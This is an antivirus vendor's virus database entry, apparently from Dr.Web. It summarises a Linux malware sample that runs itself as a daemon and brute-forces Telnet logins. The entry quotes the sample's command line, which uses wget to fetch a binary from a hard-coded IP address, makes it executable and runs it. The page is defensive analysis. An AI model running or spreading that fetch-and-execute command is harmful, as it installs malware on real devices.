Your browser is obsolete!
The page may not load correctly.
Added to the Dr.Web virus database:
Virus description added:
Launches itself as a daemon
Substitutes application name for:
- sh -c wget http://220.127.116.11/swrgiuhguhwrguiwetu/mpsl -O - > cc; chmod 777 cc; ./cc loader
- wget http://18.104.22.168/swrgiuhguhwrguiwetu/mpsl -O -
- chmod 777 cc
- ./cc loader
Kills the following processes:
Performs operations with the file system:
Modifies file access rights:
Creates or modifies files:
Awaits incoming connections on ports:
Attacks using a special dictionary (brute-force technique) via the Telnet protocol.
HTTP GET requests:
Sends data to the following servers:
Receives data from the following servers:
One month (no registration) or three months (registration and renewal discount)
© Doctor Web
2003 — 2020
Doctor Web is the Russian developer of Dr.Web anti-virus software. Dr.Web anti-virus software has been developed since 1992.
2-12А, 3rd street Yamskogo polya, Moscow, Russia, 125124